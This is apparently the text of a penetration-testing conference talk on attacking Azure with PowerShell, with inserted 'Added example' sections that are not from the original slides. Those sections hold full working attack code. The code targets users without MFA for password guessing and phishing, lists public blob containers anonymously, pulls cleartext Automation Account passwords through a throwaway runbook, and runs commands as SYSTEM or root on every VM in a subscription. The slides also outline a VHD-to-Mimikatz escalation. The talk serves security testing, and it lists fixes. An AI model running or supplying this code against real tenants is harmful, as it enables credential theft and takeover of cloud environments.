ATTACKING AZURE ENVIRONMENTS
WITH POWERSHELL
KARL FOSAAEN
2 Confidential & Proprietary
WHO AM I
Karl Fosaaen
 Pen Tester
 Password Cracker
 Social Engineer
 Blogger
 Cloud Enthusiast
 Homebrewer
https://github.com/netspi
https://blog.netspi.com/
Twitter - @kfosaaen
TALK OVERVIEW
 Outline
 Intro to Dumping Azure Data
− Why/How
 Azure Services Covered
− AzureAD Users and Groups
− Storage Accounts
− AzureSQL
− Passwords
 Demos/Questions
− Sample Escalation Process
DUMPING AZURE DATA
DUMPING AZURE DATA
 Why do we want to dump data from Azure?
 We frequently get Azure creds during assessments
− AD integrated with Azure AD + a password like Fall2018 (cracked from a DCSync dump, or simply guessed) = Azure access
 Regular domain users can usually list info about Azure
− Not regularly locked down: by default any member user can read the directory (users, groups, devices, registered apps)
 Azure infrastructure audits
 Why can we do this?
 Azure management is available over the internet
 Frequently without MFA
 Why do we want to automate this?
 Doing a million PS commands by hand is annoying
DUMPING AZURE DATA
 MicroBurst
 GitHub Link - https://github.com/NetSPI/MicroBurst
 Current Functions:
▪ Invoke-EnumerateAzureBlobs
▪ Invoke-EnumerateAzureSubDomains
▪ Get-AzurePasswords
▪ Get-AzureDomainInfo
▪ Get-MSOLDomainInfo
 Module Dependencies:
− Azure
− AzureRM
− MSOnline
AZURE PERMISSIONS
 Permissions
 Three Important Levels (Azure RBAC built-in roles, assigned at subscription, resource group or resource scope)
− Owner – full access, including granting roles to others
− Contributor – create, change and delete resources, but can’t assign roles
− Reader – view resources only
 Additional Roles
− Different Administrative/Reader Roles
− Not hugely important here
DUMPING AZURE DATA
 Ways to dump data from Azure
 Azure Portal
− Pros – Graphical interface, easy to look at for review
− Cons – Not great at scale
 REST APIs
− Pros – Structured, JSON return data
− Cons – Authentication pain points, JSON data formatting
 PowerShell Cmdlets
− Pros
− Integrated Auth
− Data returned as pipeline-able objects
− Easier output
− Can handle data at scale
− Cons
− Limited threading options
DUMPING AZURE DATA
 PowerShell Cmdlet Modules
 Azure Service Management (ASM)
− Older style of Azure Administration
 AzureRM
− Newer option for Resource Management
 Az
− Latest option, currently in preview
− Will eventually replace AzureRM
 MSOnline
− Office 365 Administration
− When you don’t have rights to run the others
DUMPING AZURE DATA
 Existing Tools
− Azucar - https://github.com/nccgroup/azucar/
− Didn’t quite fit my use cases
− Didn’t work well with several of the environments I tried
− AzuriteExplorer - https://github.com/mwrlabs/Azurite
− Similar functionality
− Doesn’t appear to be actively maintained (broken AzureRM cmdlets)
DUMPING AZURE DATA
 Required Reading
 Pentesting Azure Applications - Matt Burrough
− https://nostarch.com/azure
 Clearly outlines testing process
 Explains why you should be doing this
 Good example scripts
AZURE SERVICES
AZURE SERVICES
 Here are some of the services that we’ll cover in this talk
 MicroBurst dumps more data than this, but we don’t have time
to cover everything
− Authenticated
− AzureAD Users and Groups
− Storage Accounts
− App Services
− AzureSQL
− NSG/Firewall Rules
− RBAC Roles
− Passwords
− Unauthenticated
− Azure Blob Storage Enumeration
− General Azure Services Enumeration
AZURE SERVICES
 AzureAD
 Users and Groups
− Additional Recon Info
− Phone Numbers
− Enrolled Devices
− Third Party Apps (SSO Integration)
− Guest Users
 Practical Examples
− Password Guessing Attacks
− Phishing
− Accessing third party apps (AWS, WebEx, HR/Expense systems)
− Office365
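Added example (this is not MicroBurst’s Get-MSOLDomainInfo, just an illustration of the recon fields listed above): pulling phone numbers, MFA registration state, guests, enrolled devices and SSO-integrated apps out of Azure AD with the MSOnline module. It assumes Connect-MsolService has already been run as an ordinary member user; none of these reads need an admin role in a default tenant.

```powershell
# Added example, not code from the slides or from MicroBurst.
# Assumes: Connect-MsolService already done as any member user of the tenant.
function Get-AzureAdRecon {
    [CmdletBinding()]
    param()

    $users = @(Get-MsolUser -All)

    # Member users with no registered strong-auth method: password guessing / phishing targets
    # (matches the "frequently without MFA" point earlier in the deck)
    $noMfa = $users | Where-Object { $_.UserType -eq 'Member' -and $_.StrongAuthenticationMethods.Count -eq 0 } |
             Select-Object UserPrincipalName, DisplayName, LastPasswordChangeTimestamp

    # Phone numbers: social engineering, and a pointer to who is likely using SMS/voice MFA
    $phones = $users | Where-Object { $_.PhoneNumber -or $_.MobilePhone } |
              Select-Object UserPrincipalName, PhoneNumber, MobilePhone

    # Guest users: external identities that sit outside the tenant's own password controls
    $guests = $users | Where-Object { $_.UserType -eq 'Guest' } |
              Select-Object UserPrincipalName, DisplayName

    # Enrolled (registered/joined) devices
    $devices = Get-MsolDevice -All |
               Select-Object DisplayName, DeviceOsType, DeviceTrustType, ApproximateLastLogonTimestamp

    # Service principals: third-party / SSO-integrated apps (AWS, WebEx, HR and expense systems...)
    $apps = Get-MsolServicePrincipal -All |
            Select-Object DisplayName, AppPrincipalId, @{ n = 'SPNs'; e = { $_.ServicePrincipalNames -join ',' } }

    [pscustomobject]@{
        UsersTotal     = $users.Count
        UsersNoMfa     = @($noMfa)
        PhoneNumbers   = @($phones)
        Guests         = @($guests)
        Devices        = @($devices)
        ThirdPartyApps = @($apps)
    }
}

# Usage: $r = Get-AzureAdRecon; $r.UsersNoMfa | Format-Table; $r.ThirdPartyApps | Format-Table
```

The UsersNoMfa list is the one to hand to the password-guessing step: it is built from the tenant’s own data rather than from a guess about who has MFA, and the phone and device lists give the pretexts for the phishing step.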
AZURE SERVICES
 Storage Accounts
 Naming Structure - <account>.*Service*.core.windows.net (e.g. netspiazure.blob.core.windows.net); account names are globally unique, so a guessed name can be confirmed with a DNS lookup
 Data Types
− Blobs (blob)
− File Services (file)
− Data Tables (table)
− Queues (queue)
AZURE SERVICES
 Anonymous Blob Enumeration
 Enumerate Storage Accounts
− DNS lookups on keywords
− Bing Searches to expand the scope
 Enumerate Public Containers
− Azure REST APIs – unauthenticated GET of https://<account>.blob.core.windows.net/<container>?restype=container&comp=list
− Only works when the container’s public access level is “Container”; the “Blob” level still serves any blob whose URL you already know, but refuses the listing
 Practical Examples
− Config files
− VHD files
− PII/Passwords
− Hosting Payloads
 Blog Post - https://blog.netspi.com/anonymously-enumerating-azure-file-resources/
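Added example (not MicroBurst’s Invoke-EnumerateAzureBlobs): the two unauthenticated steps behind anonymous blob enumeration, a DNS check for the account and an anonymous REST listing of a container, plus the parser for the listing. The storage account names, container names and the sample XML response are made up for the example; the parser runs against the embedded sample without touching the network.

```powershell
# Added example, not code from the slides or from MicroBurst.
# Account/container names and the sample listing below are constructed for illustration.

function Test-AzureStorageAccount {
    # Step 1: account names are globally unique, so <name>.blob.core.windows.net resolves
    # only if the account exists. No credentials involved.
    param([Parameter(Mandatory)][string]$Name)
    try { $null = [System.Net.Dns]::GetHostAddresses("$Name.blob.core.windows.net"); $true }
    catch { $false }
}

function ConvertFrom-BlobListXml {
    # Step 2b: turn a List Blobs response into objects. The service prefixes the body with a
    # UTF-8 BOM that makes the [xml] cast fail ("Data at the root level is invalid"), so strip it.
    param([Parameter(Mandatory)][string]$Xml)
    $doc  = [xml]($Xml.TrimStart([char]0xFEFF))
    $base = $doc.EnumerationResults.ServiceEndpoint + $doc.EnumerationResults.ContainerName + '/'
    foreach ($b in $doc.EnumerationResults.Blobs.Blob) {
        [pscustomobject]@{
            Name     = $b.Name
            Bytes    = [int64]$b.Properties.'Content-Length'
            Modified = $b.Properties.'Last-Modified'
            Url      = $base + $b.Name
        }
    }
}

function Get-PublicBlobList {
    # Step 2a: list a container anonymously. Succeeds only when the container's public access
    # level is "Container". At the "Blob" level anyone can still GET a blob whose URL they know,
    # but the listing returns 404, so a 404 here does not prove the container is private or absent.
    param([Parameter(Mandatory)][string]$Account, [Parameter(Mandatory)][string]$Container)
    $uri = "https://$Account.blob.core.windows.net/$($Container)?restype=container&comp=list"
    try {
        $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -ErrorAction Stop
        ConvertFrom-BlobListXml -Xml $resp.Content
    } catch {
        Write-Verbose "$uri : $($_.Exception.Message)"
    }
}

# Constructed sample of what a listing of a public "backups" container looks like,
# so the parser can be exercised offline.
$SampleListXml = @'
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://netspiazure.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>web.config</Name><Properties><Last-Modified>Sat, 20 Oct 2018 15:00:00 GMT</Last-Modified><Content-Length>1337</Content-Length></Properties></Blob>
    <Blob><Name>disks/dc01.vhd</Name><Properties><Last-Modified>Sat, 20 Oct 2018 15:00:00 GMT</Last-Modified><Content-Length>137438953472</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>
'@
ConvertFrom-BlobListXml -Xml $SampleListXml | Format-Table Name, Bytes, Url -AutoSize

# Live use (network): confirm guessed account names, then try common container names.
# 'netspiazure','netspibackups' | Where-Object { Test-AzureStorageAccount $_ } | ForEach-Object {
#     $a = $_; 'backups','vhds','public','$web' | ForEach-Object { Get-PublicBlobList $a $_ -Verbose }
# }
```

The VHD entry in the sample is the interesting one for the escalation demo later in the deck: a 128 GB disk image in a public container is exactly the artifact that gets downloaded and mined for credentials.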
AZURE SERVICES
 Azure SQL
 Microsoft SQL – In the Cloud
 Data Access
− Firewall rules requirements
− SQL Management Studio
− Direct Portal Access
 Azure SQL as a C2 -------------→
 Practical Examples
− Dev ENV
− Open FW rules
− Weak SA Password
AZURE SERVICES
 Passwords
 Key Vaults
− Keys
− Certs
− Passwords
 App Services Configurations
− Deployment Credentials
− Database Connection Strings
 Automation Accounts
− Credentials for Azure Automation accounts
 Blog Post - https://blog.netspi.com/get-azurepasswords/
AZURE SERVICES
 Passwords
 Automation Accounts
− Credentials for Azure Automation accounts
− Process:
− Create Automation Script
− Import Automation Script
− Run Automation Script
− Get Automation Script Output
− Delete Automation Script
 Blog Post - https://blog.netspi.com/get-azurepasswords/
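Added example (not MicroBurst’s Get-AzurePasswords): the five-step Automation Account process above, written out with AzureRM cmdlets (for the Az module, swap “AzureRm” for “Az” in each cmdlet name). It assumes Connect-AzureRmAccount has already been run with Contributor rights on the target Automation Account; the resource group and account names passed in are placeholders.

```powershell
# Added example, not code from the slides or from MicroBurst.
# Assumes: Connect-AzureRmAccount done, Contributor on the Automation Account.
function Get-AutomationCredentialPlaintext {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$AutomationAccountName
    )
    $common = @{ ResourceGroupName = $ResourceGroupName; AutomationAccountName = $AutomationAccountName }

    # Credential asset *names* are readable through the API; the secrets are not. A runbook
    # executing inside the account can call Get-AutomationPSCredential and echo them back.
    $names = @(Get-AzureRmAutomationCredential @common | Select-Object -ExpandProperty Name)
    if ($names.Count -eq 0) { Write-Verbose 'No credential assets in this account'; return }

    # 1. Create the runbook script: names are templated in, one JSON line per credential
    $quoted = ($names | ForEach-Object { "'$_'" }) -join ','
    $body = @'
foreach ($n in @(__NAMES__)) {
    $c = Get-AutomationPSCredential -Name $n
    [pscustomobject]@{ Name = $n; UserName = $c.UserName; Password = $c.GetNetworkCredential().Password } |
        ConvertTo-Json -Compress
}
'@ -replace '__NAMES__', $quoted
    $runbook = 'rb' + [guid]::NewGuid().ToString('N').Substring(0, 8)
    $path    = Join-Path ([IO.Path]::GetTempPath()) "$runbook.ps1"
    Set-Content -Path $path -Value $body

    try {
        # 2. Import (and publish) it into the Automation Account
        $null = Import-AzureRmAutomationRunbook @common -Path $path -Name $runbook -Type PowerShell -Published

        # 3. Run it and poll until the job reaches a terminal state
        $job = Start-AzureRmAutomationRunbook @common -Name $runbook
        do {
            Start-Sleep -Seconds 10
            $job = Get-AzureRmAutomationJob @common -Id $job.JobId
        } until ($job.Status -in 'Completed', 'Failed', 'Stopped', 'Suspended')
        if ($job.Status -ne 'Completed') { throw "Job ended with status $($job.Status)" }

        # 4. Read the Output stream; each record's Summary holds one JSON line from the script
        Get-AzureRmAutomationJobOutput @common -Id $job.JobId -Stream Output |
            ForEach-Object { $_.Summary | ConvertFrom-Json }
    } finally {
        # 5. Remove the runbook and the local copy of the script
        Remove-AzureRmAutomationRunbook @common -Name $runbook -Force -ErrorAction SilentlyContinue
        Remove-Item -Path $path -ErrorAction SilentlyContinue
    }
}

# Usage: Get-AutomationCredentialPlaintext -ResourceGroupName 'rg-automation' -AutomationAccountName 'aa-prod' |
#            Format-Table Name, UserName, Password
```

Two caveats for anyone running this on an engagement. The cleartext passwords land in the job’s output stream, which stays in the account’s job history after the runbook is deleted, so note it in the report for cleanup. And every step is a write to the Activity Log (runbook create, job start, runbook delete), which is exactly the sequence a defender should alert on.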
MICROBURST USAGE
 MicroBurst
 How to Run the Tools
− Import the Module
− Import-Module C:\MicroBurst\MicroBurst.psm1 -Verbose
 CMD Examples
− Invoke-EnumerateAzureBlobs -Base microburst
− Invoke-EnumerateAzureSubDomains -Base microburst -Verbose
− Get-AzurePasswords -Verbose | Out-GridView
− Get-AzureDomainInfo -folder MicroBurst -Verbose
− Get-MSOLDomainInfo -folder MicroBurst -Verbose
DEMO
DEMO
 Sample Escalation
 Anonymously enumerate a public blob storage container (Invoke-EnumerateAzureBlobs)
− List files
− Download VHD
− Parse credentials from VHD file
− Crack hashes for Local Creds and Cached Creds
− Run VHD locally
− Login to VM (via RDP)
− Login to Azure with the cracked domain creds
 Connect as domain user and dump domain info (Get-AzureDomainInfo)
− List out users/services/etc.
 Dump remaining domain passwords for Azure subscription (Get-AzurePasswords)
− Get VPN access, pivot to internal domain/network
 Execute Commands on all Azure VMs (as nt authority\SYSTEM)
CRACKING LOCAL ADMIN
LOCAL ADMIN -> LOAD VHD IN HYPER-V
LOCAL ADMIN -> RDP -> MIMIKATZ
*Ideal Situation
ktest also happens to be a DA
RDP is open to everywhere
GRABBING CACHED CREDENTIALS
*Slightly more realistic situation
RDP is not open
But the system is domain joined
CRACKING CACHED CREDENTIALS
*Slightly more realistic situation
RDP is not open
But the system is domain joined
DEMO - CODE EXECUTION
 Execute Commands on all Azure VMs (as nt authority\SYSTEM)
− Invoke-AzureRmVMRunCommand
− Requires “Contributor” rights
 Practical Uses
− Mimikatz everything
− Task C2 agents
− Search for data
 Not Practical Uses
− Botnets
− Crypto miners
− Delete everything
 Mileage may vary depending on VM/Region
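Added example (not from the slides): Invoke-AzureRmVMRunCommand run across every running VM in the subscription, picking the Windows or Linux command variant per VM. It assumes Connect-AzureRmAccount has already been run with Contributor rights (the Microsoft.Compute/virtualMachines/runCommand/action permission) and that the VMs have a working Azure agent; the default scripts only prove the execution context.

```powershell
# Added example, not code from the slides or from MicroBurst.
# Assumes: Connect-AzureRmAccount done, Contributor on the VMs, VM agent present.
function Invoke-CommandOnAllAzureVMs {
    [CmdletBinding()]
    param(
        [string]$WindowsScript = 'whoami; hostname',   # runs as NT AUTHORITY\SYSTEM
        [string]$LinuxScript   = 'id; hostname'        # runs as root
    )
    # Run Command takes a script file, so stage both variants on local disk
    $tmp     = [IO.Path]::GetTempPath()
    $winPath = Join-Path $tmp 'rc.ps1'; Set-Content -Path $winPath -Value $WindowsScript
    $nixPath = Join-Path $tmp 'rc.sh';  Set-Content -Path $nixPath -Value $LinuxScript

    foreach ($vm in Get-AzureRmVM -Status) {
        # Deallocated/stopped VMs have no agent to talk to: skip them instead of waiting on a timeout
        if ($vm.PowerState -ne 'VM running') { continue }

        $isWindows = $vm.StorageProfile.OsDisk.OsType -eq 'Windows'
        $commandId = if ($isWindows) { 'RunPowerShellScript' } else { 'RunShellScript' }
        $script    = if ($isWindows) { $winPath } else { $nixPath }

        try {
            # Sequential on purpose (the "limited threading" con from earlier); -AsJob is the
            # cmdlet's own option for running several VMs at once.
            $r = Invoke-AzureRmVMRunCommand -ResourceGroupName $vm.ResourceGroupName -VMName $vm.Name `
                     -CommandId $commandId -ScriptPath $script -ErrorAction Stop
            [pscustomobject]@{
                VM     = $vm.Name
                RG     = $vm.ResourceGroupName
                OS     = $vm.StorageProfile.OsDisk.OsType
                Status = $r.Status
                StdOut = ($r.Value | Where-Object Code -like '*StdOut*').Message
                StdErr = ($r.Value | Where-Object Code -like '*StdErr*').Message
            }
        } catch {
            [pscustomobject]@{ VM = $vm.Name; RG = $vm.ResourceGroupName; OS = $null
                               Status = 'Error'; StdOut = $null; StdErr = $_.Exception.Message }
        }
    }
}

# Usage: Invoke-CommandOnAllAzureVMs | Format-Table VM, OS, Status, StdOut -AutoSize
```

For the blue team reading this: each invocation is a `Microsoft.Compute/virtualMachines/runCommand/action` event in the Activity Log, and the script itself is written to the guest under `C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<version>\Downloads\` on Windows and `/var/lib/waagent/run-command/download/` on Linux before it runs, so both the control plane and the endpoint see it.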
DEMO - CODE EXECUTION
FIXES/CONCLUSIONS
FIXES / CONCLUSIONS
 Fixes
 Limit Azure Management access for non-admin users
 Watch out for misconfigurations in your Azure environment
 Try to get users to stop using Fall2018 as a password
 Set up MFA for all users with Azure access
 Conclusions
 The cloud is complicated, misconfigurations will happen
 But there are options for mitigating the risks
QUESTIONS
Thanks!
NetSPI co-workers for the QA/Testing/Ideas
All of you who came to a Saturday afternoon talk
And all of you watching this on YouTube
ADDITIONAL INFO
 MicroBurst GitHub - https://github.com/NetSPI/MicroBurst
 NetSPI Blog - https://blog.netspi.com
 MicroBurst Specific Blogs:
 https://blog.netspi.com/get-azurepasswords/
 https://blog.netspi.com/anonymously-enumerating-azure-file-resources/
 https://blog.netspi.com/enumerating-azure-services/
 Twitter - @kfosaaen
 SlideShare - http://www.slideshare.net/kfosaaen
MINNEAPOLIS | NEW YORK | PORTLAND | DENVER | DALLAS
https://www.netspi.com
https://www.facebook.com/netspi
@NetSPI
https://www.slideshare.net/NetSPI
BSides Portland - Attacking Azure Environments with PowerShell